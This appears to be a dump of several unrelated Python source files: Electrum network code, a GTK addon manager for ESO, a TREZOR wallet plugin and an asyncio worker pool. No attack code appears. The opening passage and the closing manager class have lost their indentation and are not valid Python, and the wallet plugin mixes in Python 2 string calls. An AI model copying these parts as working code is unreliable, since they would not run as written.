blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise BaseException('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
q = queue.Queue()
self.send([request], q.put)
try:
r = q.get(True, timeout)
except queue.Empty:
raise util.TimeoutException(_('Server did not answer'))
if r.get('error'):
raise BaseException(r.get('error'))
return r.get('result')
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
def export_checkpoints(self, path):
# run manually from the console to generate checkpoints
cp = self.blockchain().get_checkpoints()
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(cp, indent=4))
def max_checkpoint(self):
return max(0, len(constants.net.CHECKPOINTS) * CHUNK_LEN - 1)
|
addonmanager.py | import gi
gi.require_version("Gtk", "3.0")
import gi
from gi.repository import Gtk, GObject
from addondownloader import AddonDownloader
from pathlib import Path
from threading import Thread
class AddonManagerWindow(Gtk.Window):
    """Main GTK window of the ESO addon manager.

    Lets the user choose the ESO addon folder, paste esoui.com links,
    and run addon / Tamriel Trade Centre (TTC) downloads on a worker
    thread through an AddonDownloader.
    """
    # NOTE(review): these are class-level (shared) attributes; in
    # particular layout_box is constructed once at class definition
    # time, so only a single window instance is supported — confirm.
    adl = None
    addons = ""
    addons_location = ""
    addons_location_field = None
    addon_link_textview = None
    layout_box = Gtk.Box.new(Gtk.Orientation.VERTICAL, 6)
    start_download_button = None
    update_ttc_button = None
    ttc_eu_radiobutton = None
    ttc_us_radiobutton = None
    status_label = None
    buttons = []
    ttc_region = "eu"
    def __init__(self):
        # Legacy call needed by older PyGObject for threaded GTK use.
        GObject.threads_init()
        super().__init__(title="ESO Addon Manager for Linux")
        self.create_addon_files()
        self.set_size_request(400, 500)
        self.timeout_id = None
        self.add(self.layout_box)
        # Build the UI widgets top to bottom.
        self.create_addon_location_field()
        self.create_addon_link_textview()
        self.create_download_button()
        self.create_ttc_radio_buttons()
        self.create_download_ttc_button()
        self.create_status_label()
        self.buttons = [self.start_download_button, self.update_ttc_button]
        # The downloader reports progress back through these callbacks.
        self.adl = AddonDownloader(self.update_buttons, self.update_status_text)
    def create_addon_location_field(self):
        """Label + entry row for the ESO addon folder path."""
        label = Gtk.Label(label="ESO Addon folder location")
        label.set_line_wrap(True)
        self.addons_location_field = Gtk.Entry()
        self.addons_location_field.set_text(self.addons_location)
        self.layout_box.pack_start(label, False, False, 0)
        self.layout_box.pack_start(self.addons_location_field, False, False, 10)
    def create_addon_link_textview(self):
        """Scrollable multi-line text view for addon page links."""
        label = Gtk.Label(label="Links to ESOUI.com addon pages, one per line")
        label.set_line_wrap(True)
        scrolledwindow = Gtk.ScrolledWindow()
        scrolledwindow.set_hexpand(True)
        scrolledwindow.set_vexpand(True)
        self.layout_box.pack_start(label, False, False, 0)
        self.layout_box.pack_start(scrolledwindow, True, True, 10)
        self.addon_link_textview = Gtk.TextView()
        self.textbuffer = self.addon_link_textview.get_buffer()
        self.textbuffer.set_text(self.addons)
        scrolledwindow.add(self.addon_link_textview)
    def create_download_button(self):
        """Button that starts the addon download."""
        self.start_download_button = Gtk.Button(label="Download")
        self.start_download_button.connect("clicked", self.on_start_download)
        self.layout_box.pack_start(self.start_download_button, False, False, 0)
    def create_download_ttc_button(self):
        """Button that starts the TTC price-table update."""
        self.update_ttc_button = Gtk.Button(label="Update TTC")
        self.update_ttc_button.connect("clicked", self.on_start_ttc_update)
        self.layout_box.pack_start(self.update_ttc_button, False, False, 0)
    def create_status_label(self):
        """Label used for progress / error feedback."""
        self.status_label = Gtk.Label(label="Ready to download...")
        self.status_label.set_line_wrap(True)
        self.layout_box.pack_start(self.status_label, False, False, 0)
    def create_addon_files(self):
        """Load persisted link list and folder location, creating the
        backing files on first run."""
        addons_file = open(self.touch_file("addons.txt"), "r+")
        addons_location_file = open(self.touch_file("addonslocation.txt"), "r+")
        self.addons = addons_file.read()
        self.addons_location = addons_location_file.read()
        addons_file.close()
        addons_location_file.close()
    def touch_file(self, filename):
        """Makes sure file exists"""
        filename = Path(filename)
        filename.touch(exist_ok=True)
        return filename
    def create_ttc_radio_buttons(self):
        """EU/US radio buttons selecting the TTC region."""
        self.ttc_eu_radiobutton = Gtk.RadioButton.new_with_label_from_widget(None, "EU")
        self.ttc_eu_radiobutton.connect("toggled", self.on_ttc_radio_button_toggled, "eu")
        self.layout_box.pack_start(self.ttc_eu_radiobutton, False, False, 0)
        self.ttc_us_radiobutton = Gtk.RadioButton.new_with_label_from_widget(self.ttc_eu_radiobutton, "US")
        self.ttc_us_radiobutton.connect("toggled", self.on_ttc_radio_button_toggled, "us")
        self.layout_box.pack_start(self.ttc_us_radiobutton, False, False, 0)
    def on_ttc_radio_button_toggled(self, button, name):
        # Called for both the activated and deactivated button; the last
        # emission wins, leaving ttc_region set to the active choice.
        self.ttc_region = name
    def update_buttons(self, sensitivity):
        """Enable/disable both action buttons (downloader callback)."""
        for button in self.buttons:
            button.set_sensitive(sensitivity)
    def update_status_text(self, text):
        """Show *text* in the status label (downloader callback)."""
        self.status_label.set_text(text)
    def on_start_ttc_update(self, widget):
        """Persist the folder location and start a TTC update thread."""
        addons_location_file = open("addonslocation.txt", "w")
        addons_location_file.write(self.addons_location_field.get_text())
        addons_location_file.close()
        adlthread = Thread(target=self.adl.start_ttc_update, args=(self.ttc_region,))
        self.handle_thread(adlthread)
    def on_start_download(self, widget):
        """Persist the folder location and link list, then start the
        addon download thread."""
        #Save all the input data to text files
        #ESO addon location folder
        addons_location_file = open("addonslocation.txt", "w")
        addons_location_file.write(self.addons_location_field.get_text())
        addons_location_file.close()
        #List of links
        addons = open("addons.txt", "w")
        textbuffer = self.addon_link_textview.get_buffer()
        start_iter = textbuffer.get_start_iter()
        end_iter = textbuffer.get_end_iter()
        links = textbuffer.get_text(start_iter, end_iter, True)
        addons.write(links.rstrip("\n"))
        addons.close()
        adlthread = Thread(target=self.adl.start)
        self.handle_thread(adlthread)
    def handle_thread(self, thread):
        """Start *thread* as a daemon, reporting failures in the status
        label."""
        thread.daemon = True
        try:
            self.update_buttons(False)
            thread.start()
            # NOTE(review): buttons are re-enabled immediately after
            # start(), not when the thread finishes; presumably the
            # downloader callbacks manage them afterwards — confirm.
            self.update_buttons(True)
        except Exception as err:
            self.update_status_text(str(err))
            self.update_buttons(True)
|
plugin.py | import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum.bitcoin import (bc_address_to_hash_160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH)
from electrum.i18n import _
from electrum.plugins import BasePlugin, hook
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods.  The order matters: these values index
# the choices list presented by initialize_device().
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
    """Keystore backed by a TREZOR-compatible hardware device."""
    def get_derivation(self):
        # BIP32 derivation prefix of this keystore (e.g. "m/44'/0'/0'").
        return self.derivation
    def get_client(self, force_pair=True):
        return self.plugin.get_client(self, force_pair)
    def decrypt_message(self, sequence, message, password):
        # Hardware wallets do not expose message decryption.
        raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
    def sign_message(self, sequence, message, password):
        """Sign *message* on the device with the key at the (change,
        index) pair *sequence* under this keystore's derivation."""
        client = self.get_client()
        address_path = self.get_derivation() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature
    def sign_transaction(self, tx, password):
        """Sign *tx* on the device.

        Collects the previous transactions referenced by the inputs and
        the derivation path of our xpub, then delegates the actual
        signing to the plugin.  No-op if *tx* is already complete.
        """
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        # path of the xpubs that are involved
        xpub_path = {}
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            tx_hash = txin['prevout_hash']
            prev_tx[tx_hash] = txin['prev_tx']
            for x_pubkey in x_pubkeys:
                if not is_xpubkey(x_pubkey):
                    continue
                xpub, s = parse_xpubkey(x_pubkey)
                # Only record the path of xpubs belonging to this keystore.
                if xpub == self.get_master_public_key():
                    xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
    """Shared plugin logic for TREZOR-compatible hardware wallets.

    NOTE: this code predates Python 3 — it uses str.decode('hex') /
    encode('hex'), which only exist on Python 2.
    """
    # Derived classes provide:
    #
    # class-static variables: client_class, firmware_URL, handler_class,
    #     libraries_available, libraries_URL, minimum_firmware,
    #     wallet_class, ckd_public, types, HidTransport
    MAX_LABEL_LEN = 32
    def __init__(self, parent, config, name):
        HW_PluginBase.__init__(self, parent, config, name)
        # Remember the GUI thread so device access can assert it runs elsewhere.
        self.main_thread = threading.current_thread()
        # FIXME: move to base class when Ledger is fixed
        if self.libraries_available:
            self.device_manager().register_devices(self.DEVICE_IDS)
    def _try_hid(self, device):
        """Attempt a raw HID transport to *device*; None on failure."""
        self.print_error("Trying to connect over USB...")
        if device.interface_number == 1:
            pair = [None, device.path]
        else:
            pair = [device.path, None]
        try:
            return self.hid_transport(pair)
        except BaseException as e:
            # see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
            # raise
            self.print_error("cannot connect at", device.path, str(e))
            return None
    def _try_bridge(self, device):
        """Attempt a Trezor Bridge transport to *device*; None on failure."""
        self.print_error("Trying to connect over Trezor Bridge...")
        try:
            return self.bridge_transport({'path': hexlify(device.path)})
        except BaseException as e:
            self.print_error("cannot connect to bridge", str(e))
            return None
    def create_client(self, device, handler):
        """Open a client for *device*, sanity-check it with a ping and a
        firmware-version check; return None if anything fails."""
        # disable bridge because it seems to never returns if keepkey is plugged
        #transport = self._try_bridge(device) or self._try_hid(device)
        transport = self._try_hid(device)
        if not transport:
            self.print_error("cannot connect to device")
            return
        self.print_error("connected to device at", device.path)
        client = self.client_class(transport, handler, self)
        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.print_error("ping failed", str(e))
            return None
        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated %s firmware for device labelled %s. Please '
                     'download the updated firmware from %s') %
                   (self.device, client.label(), self.firmware_URL))
            self.print_error(msg)
            handler.show_error(msg)
            return None
        return client
    def get_client(self, keystore, force_pair=True):
        """Return (and mark used) the device client paired to *keystore*."""
        # All client interaction should not be in the main GUI thread
        assert self.main_thread != threading.current_thread()
        devmgr = self.device_manager()
        handler = keystore.handler
        with devmgr.hid_lock:
            client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client
    def get_coin_name(self):
        """Coin name string understood by the device firmware."""
        return "Testnet" if TESTNET else "Bitcoin"
    def initialize_device(self, device_id, wizard, handler):
        """Ask the user how to initialize an uninitialized device and run
        the chosen method on a worker thread."""
        # Initialization method
        msg = _("Choose how you want to initialize your %s.\n\n"
                "The first two methods are secure as no secret information "
                "is entered into your computer.\n\n"
                "For the last two methods you input secrets on your keyboard "
                "and upload them to your %s, and so you should "
                "only do those on a computer you know to be trustworthy "
                "and free of malware."
        ) % (self.device, self.device)
        choices = [
            # Must be short as QT doesn't word-wrap radio button text
            (TIM_NEW, _("Let the device generate a completely new seed randomly")),
            (TIM_RECOVER, _("Recover from a seed you have previously written down")),
            (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
            (TIM_PRIVKEY, _("Upload a master private key"))
        ]
        def f(method):
            import threading
            settings = self.request_trezor_init_settings(wizard, method, self.device)
            t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
            t.setDaemon(True)
            t.start()
            # Block the wizard until _initialize_device exits the loop.
            wizard.loop.exec_()
        wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
    def _initialize_device(self, settings, method, device_id, wizard, handler):
        """Worker-thread body for initialize_device; performs the chosen
        initialization method and releases the wizard loop when done."""
        item, label, pin_protection, passphrase_protection = settings
        if method == TIM_RECOVER and self.device == 'TREZOR':
            # Warn user about firmware lameness
            handler.show_error(_(
                "You will be asked to enter 24 words regardless of your "
                "seed's actual length.  If you enter a word incorrectly or "
                "misspell it, you cannot change it or go back - you will need "
                "to start again from the beginning.\n\nSo please enter "
                "the words carefully!"))
        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language)
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)
        wizard.loop.exit(0)
    def setup_device(self, device_info, wizard):
        '''Called when creating a new wallet.  Select the device to use.  If
        the device is uninitialized, go through the intialization
        process.'''
        devmgr = self.device_manager()
        device_id = device_info.device.id_
        client = devmgr.client_by_id(device_id)
        # fixme: we should use: client.handler = wizard
        client.handler = self.create_handler(wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        client.get_xpub('m')
        client.used()
    def get_xpub(self, device_id, derivation, wizard):
        """Fetch the xpub at *derivation* from the device."""
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        client.handler = wizard
        xpub = client.get_xpub(derivation)
        client.used()
        return xpub
    def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        """Sign *tx* on the device and merge the signatures back in."""
        self.prev_tx = prev_tx
        self.xpub_path = xpub_path
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, True)
        outputs = self.tx_outputs(keystore.get_derivation(), tx)
        signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
        raw = signed_tx.encode('hex')
        tx.update_signatures(raw)
    def show_address(self, wallet, address):
        """Display *address* on the device screen for verification."""
        client = self.get_client(wallet.keystore)
        if not client.atleast_version(1, 3):
            # BUGFIX: was `keystore.handler...` which raised NameError —
            # `keystore` is not defined in this method's scope.
            wallet.keystore.handler.show_error(_("Your device firmware is too old"))
            return
        change, index = wallet.get_address_index(address)
        derivation = wallet.keystore.derivation
        address_path = "%s/%d/%d"%(derivation, change, index)
        address_n = client.expand_path(address_path)
        client.get_address(self.get_coin_name(), address_n, True)
    def tx_inputs(self, tx, for_sig=False):
        """Convert electrum tx inputs to the device's TxInputType protos.

        When *for_sig* is true the inputs carry the derivation paths /
        multisig scripts needed for signing; otherwise only the outpoint
        data is filled in (used when streaming previous transactions).
        """
        inputs = []
        for txin in tx.inputs():
            txinputtype = self.types.TxInputType()
            if txin['type'] == 'coinbase':
                prev_hash = "\0"*32
                prev_index = 0xffffffff  # signed int -1
            else:
                if for_sig:
                    x_pubkeys = txin['x_pubkeys']
                    if len(x_pubkeys) == 1:
                        # Single-sig: just point the device at our key path.
                        x_pubkey = x_pubkeys[0]
                        xpub, s = parse_xpubkey(x_pubkey)
                        xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                        txinputtype.address_n.extend(xpub_n + s)
                    else:
                        # Multisig: build the redeem script description.
                        def f(x_pubkey):
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                            else:
                                xpub = xpub_from_pubkey(0, x_pubkey.decode('hex'))
                                s = []
                            node = self.ckd_public.deserialize(xpub)
                            return self.types.HDNodePathType(node=node, address_n=s)
                        pubkeys = map(f, x_pubkeys)
                        multisig = self.types.MultisigRedeemScriptType(
                            pubkeys=pubkeys,
                            signatures=map(lambda x: x.decode('hex')[:-1] if x else '', txin.get('signatures')),
                            m=txin.get('num_sig'),
                        )
                        txinputtype = self.types.TxInputType(
                            script_type=self.types.SPENDMULTISIG,
                            multisig=multisig
                        )
                        # find which key is mine
                        for x_pubkey in x_pubkeys:
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                                if xpub in self.xpub_path:
                                    xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                                    txinputtype.address_n.extend(xpub_n + s)
                                    break
                prev_hash = unhexlify(txin['prevout_hash'])
                prev_index = txin['prevout_n']
            txinputtype.prev_hash = prev_hash
            txinputtype.prev_index = prev_index
            if 'scriptSig' in txin:
                script_sig = txin['scriptSig'].decode('hex')
                txinputtype.script_sig = script_sig
            # Default to the "RBF disabled" sequence if none is given.
            txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
            inputs.append(txinputtype)
        return inputs
    def tx_outputs(self, derivation, tx):
        """Convert electrum tx outputs to the device's TxOutputType
        protos, marking at most one output as our change so the device
        does not ask the user to confirm it."""
        outputs = []
        has_change = False
        for _type, address, amount in tx.outputs():
            info = tx.output_info.get(address)
            if info is not None and not has_change:
                has_change = True  # no more than one change address
                addrtype, hash_160 = bc_address_to_hash_160(address)
                index, xpubs, m = info
                if addrtype == ADDRTYPE_P2PKH:
                    address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
                    txoutputtype = self.types.TxOutputType(
                        amount = amount,
                        script_type = self.types.PAYTOADDRESS,
                        address_n = address_n,
                    )
                elif addrtype == ADDRTYPE_P2SH:
                    address_n = self.client_class.expand_path("/%d/%d"%index)
                    nodes = map(self.ckd_public.deserialize, xpubs)
                    pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
                    multisig = self.types.MultisigRedeemScriptType(
                        pubkeys = pubkeys,
                        signatures = [b''] * len(pubkeys),
                        m = m)
                    txoutputtype = self.types.TxOutputType(
                        multisig = multisig,
                        amount = amount,
                        script_type = self.types.PAYTOMULTISIG)
            else:
                txoutputtype = self.types.TxOutputType()
                txoutputtype.amount = amount
                if _type == TYPE_SCRIPT:
                    # OP_RETURN output: payload follows the opcode bytes.
                    txoutputtype.script_type = self.types.PAYTOOPRETURN
                    txoutputtype.op_return_data = address[2:]
                elif _type == TYPE_ADDRESS:
                    addrtype, hash_160 = bc_address_to_hash_160(address)
                    if addrtype == ADDRTYPE_P2PKH:
                        txoutputtype.script_type = self.types.PAYTOADDRESS
                    elif addrtype == ADDRTYPE_P2SH:
                        txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
                    else:
                        raise BaseException('addrtype')
                    txoutputtype.address = address
            outputs.append(txoutputtype)
        return outputs
    def electrum_tx_to_txtype(self, tx):
        """Convert an electrum Transaction into the device's
        TransactionType proto (used to stream previous transactions)."""
        t = self.types.TransactionType()
        d = deserialize(tx.raw)
        t.version = d['version']
        t.lock_time = d['lockTime']
        inputs = self.tx_inputs(tx)
        t.inputs.extend(inputs)
        for vout in d['outputs']:
            o = t.bin_outputs.add()
            o.amount = vout['value']
            o.script_pubkey = vout['scriptPubKey'].decode('hex')
        return t
    # This function is called from the trezor libraries (via tx_api)
    def get_tx(self, tx_hash):
        tx = self.prev_tx[tx_hash]
        return self.electrum_tx_to_txtype(tx)
|
worker.py | import asyncio
import dataclasses
import itertools
import typing as t
from dataclasses import dataclass, field
from functools import partial
from queue import Empty, SimpleQueue
from threading import Event, ThreadError
from time import monotonic
from hybrid_pool_executor.base import (
Action,
BaseManager,
BaseManagerSpec,
BaseTask,
BaseWorker,
BaseWorkerSpec,
CancelledError,
Function,
Future,
)
from hybrid_pool_executor.constants import (
ACT_CLOSE,
ACT_DONE,
ACT_EXCEPTION,
ACT_NONE,
ACT_RESET,
ACT_RESTART,
)
from hybrid_pool_executor.utils import KillableThread, coalesce, isasync, rectify
# Convenience alias for the type of None (mirrors types.NoneType).
NoneType = type(None)
@dataclass
class AsyncTask(BaseTask):
    # Future resolved with the coroutine's result or exception.
    future: Future = field(default_factory=Future)
@dataclass
class AsyncWorkerSpec(BaseWorkerSpec):
    # Max tasks a worker may run before being restarted; -1 = unlimited.
    max_task_count: int = -1
    # Max total errors before the worker is restarted.
    max_err_count: int = 10
    # Worker threads do not block interpreter shutdown.
    daemon: bool = True
class AsyncWorker(BaseWorker):
    """Worker that runs coroutine tasks on a private asyncio event loop
    hosted in its own killable thread.

    Tasks arrive on the spec's task_bus; control messages (reset /
    close / restart) arrive on request_bus; completion and lifecycle
    Actions are reported on response_bus.
    """
    def __init__(self, spec: AsyncWorkerSpec):
        # Copy the spec so later mutation by the caller has no effect.
        self._spec = dataclasses.replace(spec)
        self._name = self._spec.name
        self._loop: t.Optional[asyncio.AbstractEventLoop] = None
        self._async_tasks: t.Dict[str, asyncio.Task] = {}
        self._current_tasks: t.Dict[str, AsyncTask] = {}
        # bare bool variable may not be synced when using start()
        self._state: t.Dict[str, bool] = {
            "inited": False,
            "running": False,
            "idle": False,
        }
        self._thread: t.Optional[KillableThread] = None
        self._current_task_name: t.Optional[str] = None
    @property
    def name(self) -> str:
        return self._name
    @property
    def spec(self) -> AsyncWorkerSpec:
        return self._spec
    def is_alive(self) -> bool:
        return self._state["running"]
    def start(self):
        """Spawn the worker thread and busy-wait until its event loop has
        actually initialized."""
        if self._state["running"] or self._thread is not None:
            raise RuntimeError(
                f'{self.__class__.__qualname__} "{self._name}" is already started.'
            )
        self._thread = KillableThread(target=self._run, daemon=self._spec.daemon)
        self._thread.start()
        # Block method until self._run actually starts to avoid creating multiple
        # workers when in high concurrency situation.
        state = self._state
        while not state["inited"]:
            pass
    async def _async_run(self):
        """Main coroutine: pull tasks from the bus, run each as an
        asyncio task, and forward result/lifecycle Actions to the
        response bus until told to stop or idle-timeout expires."""
        state = self._state
        state["running"] = True
        state["idle"] = True
        state["inited"] = True
        # Hoist frequently-used spec fields into locals.
        spec = self._spec
        worker_name: str = self._name
        task_bus: SimpleQueue = spec.task_bus
        request_bus: SimpleQueue = spec.request_bus
        response_bus: SimpleQueue = spec.response_bus
        max_task_count: int = spec.max_task_count
        max_err_count: int = spec.max_err_count
        max_cons_err_count: int = spec.max_cons_err_count
        idle_timeout: float = spec.idle_timeout
        wait_interval: float = spec.wait_interval
        loop = t.cast(asyncio.BaseEventLoop, self._loop)
        async_tasks = self._async_tasks
        async_response_bus = asyncio.Queue()
        async def coroutine(
            task: AsyncTask,
            worker_name: str,
            bus: asyncio.Queue,
        ):
            # Run one task, resolve its future, and report on *bus*.
            result = resp = None
            try:
                task.fn = t.cast(t.Callable[..., t.Any], task.fn)
                result = await task.fn(*task.args, **task.kwargs)
            except Exception as exc:
                resp = Action(
                    flag=ACT_EXCEPTION,
                    task_name=task.name,
                    worker_name=worker_name,
                )
                task.future.set_exception(exc)
            else:
                resp = Action(
                    flag=ACT_DONE,
                    task_name=task.name,
                    worker_name=worker_name,
                )
                task.future.set_result(result)
            finally:
                await bus.put(resp)
        task_count: int = 0
        err_count: int = 0
        cons_err_count: int = 0
        current_coroutines: int = 0
        is_prev_coro_err: bool = False
        response = None
        idle_tick = monotonic()
        while True:
            # Idle bookkeeping: close the worker after idle_timeout with
            # no running coroutines.
            if current_coroutines > 0:
                state["idle"] = False
                idle_tick = monotonic()
            else:
                state["idle"] = True
                if monotonic() - idle_tick > idle_timeout:
                    response = Action(flag=ACT_CLOSE, worker_name=worker_name)
                    break
            # Drain control requests first.
            while not request_bus.empty():
                request: Action = request_bus.get()
                if request.match(ACT_RESET):
                    task_count = 0
                    err_count = 0
                    cons_err_count = 0
                if request.match(ACT_CLOSE, ACT_RESTART):
                    response = Action(flag=request.flag, worker_name=worker_name)
                    break
            if not state["running"]:
                break
            try:
                # Accept new tasks while under the per-worker task limit.
                while not 0 <= max_task_count <= task_count:
                    task: AsyncTask = task_bus.get(timeout=wait_interval)
                    # check if future is cancelled
                    if task.cancelled:
                        # NOTE(review): this Action is put on the *task*
                        # bus, not the response bus — looks like it was
                        # meant for response_bus; confirm.
                        task_bus.put(
                            Action(
                                flag=ACT_EXCEPTION,
                                task_name=task.name,
                                worker_name=worker_name,
                                exception=CancelledError(
                                    f'Future "{task.name}" has been cancelled'
                                ),
                            )
                        )
                        del task
                        continue
                    else:
                        state["idle"] = False
                        async_task: asyncio.Task = loop.create_task(
                            coroutine(
                                task=task,
                                worker_name=worker_name,
                                bus=async_response_bus,
                            )
                        )
                        async_tasks[task.name] = async_task
                        del task
                        task_count += 1
                        current_coroutines += 1
            except Empty:
                pass
            # Yield control so the scheduled coroutines can make progress.
            await asyncio.sleep(0)  # ugly but works
            # Collect completions and update error statistics.
            while not async_response_bus.empty():
                response = await async_response_bus.get()
                await async_tasks.pop(response.task_name)
                current_coroutines -= 1
                if response.match(ACT_EXCEPTION):
                    err_count += 1
                    if is_prev_coro_err:
                        cons_err_count += 1
                    else:
                        cons_err_count = 1
                    is_prev_coro_err = True
                else:
                    cons_err_count = 0
                    is_prev_coro_err = False
                # Request a restart when any limit has been reached.
                if (
                    0 <= max_task_count <= task_count
                    or 0 <= max_err_count <= err_count
                    or 0 <= max_cons_err_count <= cons_err_count
                ):
                    response.add_flag(ACT_RESTART)
                    response_bus.put(response)
                    state["running"] = False
                    break
                response_bus.put(response)
                response = None
            if not state["running"]:
                break
        # Shutdown: wait for in-flight coroutines, then flush responses.
        state["running"] = False
        for async_task in async_tasks.values():
            if not async_task.done():
                await async_task
        if response is not None and response.flag != ACT_NONE:
            if not response.match(ACT_CLOSE, ACT_RESTART):
                response_bus.put(response)
            else:
                # Close/restart Actions go out last, after task responses.
                await async_response_bus.put(response)
        while not async_response_bus.empty():
            response = await async_response_bus.get()
            response_bus.put(response)
        self._thread = None
    def _run(self):
        # Thread body: host a fresh event loop running _async_run.
        self._loop = asyncio.new_event_loop()
        self._loop.run_until_complete(self._async_run())
    def stop(self):
        """Request a stop and join the worker thread."""
        self._state["running"] = False
        if self._thread and self._thread.is_alive():
            self._thread.join()
        self._thread = None
    def terminate(self):
        """Forcefully kill the worker thread."""
        self._state["running"] = False
        try:
            if self._thread and self._thread.is_alive():
                self._thread.terminate()
        except ThreadError:
            pass
        self._thread = None
    def is_idle(self) -> bool:
        # A stopped worker is never reported as idle.
        state = self._state
        return state["idle"] if state["running"] else False
@dataclass
class AsyncManagerSpec(BaseManagerSpec):
    mode: str = "async"
    # Number of workers to maintain; negative means unbounded.
    num_workers: int = 1
    name_pattern: str = "AsyncManager-{manager_seq}"
    # -1: unlimited; 0: same as num_workers
    max_processing_responses_per_iteration: int = -1
    # Seconds without tasks/responses before the manager loop exits.
    idle_timeout: float = 60.0
    worker_name_pattern: str = "AsyncWorker-{worker} [{manager}]"
    task_name_pattern: str = "AsyncTask-{task} [{manager}]"
    # Template spec that get_worker_spec() fills in per worker.
    default_worker_spec: AsyncWorkerSpec = field(
        default_factory=partial(AsyncWorkerSpec, name="DefaultWorkerSpec")
    )
class AsyncManager(BaseManager):
_next_manager_seq = itertools.count().__next__
def __init__(self, spec: AsyncManagerSpec):
self._spec = dataclasses.replace(spec)
self._default_worker_spec = dataclasses.replace(spec.default_worker_spec)
self._name = self._spec.name_pattern.format(
manager_seq=self._next_manager_seq()
)
self._next_worker_seq = itertools.count().__next__
self._next_task_seq = itertools.count().__next__
self._state: t.Dict[str, bool] = {
"inited": False,
"running": False,
}
self._task_bus = SimpleQueue()
self._response_bus = SimpleQueue()
self._current_workers: t.Dict[str, AsyncWorker] = {}
self._current_tasks: t.Dict[str, t.Any] = {}
self._thread: t.Optional[KillableThread] = None
def start(self):
if self._state["running"] or self._thread is not None:
raise RuntimeError(f'ThreadManager "{self._name}" is already started.')
self._thread = KillableThread(target=self._run, daemon=True)
self._thread.start()
state = self._state
while not state["inited"]:
pass
def is_alive(self) -> bool:
return self._state["running"]
def _run(self):
state = self._state
state["running"] = True
state["inited"] = True
metronome = Event()
wait_interval: float = rectify(coalesce(self._spec.wait_interval, 0.1), 0.1)
idle_timeout: float = rectify(coalesce(self._spec.idle_timeout, 60), 60)
num_process_limit: int = rectify(
coalesce(self._spec.max_processing_responses_per_iteration, -1), -1
)
current_tasks = self._current_tasks
response_bus = self._response_bus
idle_tick = monotonic()
while True:
if not current_tasks and response_bus.empty():
if monotonic() - idle_tick > idle_timeout:
break
else:
idle_tick = monotonic()
if not state["running"]:
break
num_processed: int = 0
while not response_bus.empty():
self._consume_response()
num_processed += 1
if num_processed >= num_process_limit:
break
if num_processed == 0:
metronome.wait(wait_interval)
state["running"] = False
while not response_bus.empty():
self._consume_response()
self._stop_all_workers()
self._thread = None
def _stop_all_workers(self):
stop_action = Action(ACT_CLOSE)
for worker in self._current_workers.values():
worker.spec.request_bus.put(stop_action)
for worker in self._current_workers.values():
worker.stop()
def stop(self, timeout: float = 5.0):
self._state["running"] = False
if self._thread and self._thread.is_alive():
self._thread.join(timeout=rectify(coalesce(timeout, 5.0), 5.0))
self._thread = None
def terminate(self):
self._state["running"] = False
try:
if self._thread and self._thread.is_alive():
self._thread.terminate()
except ThreadError:
pass
self._thread = None
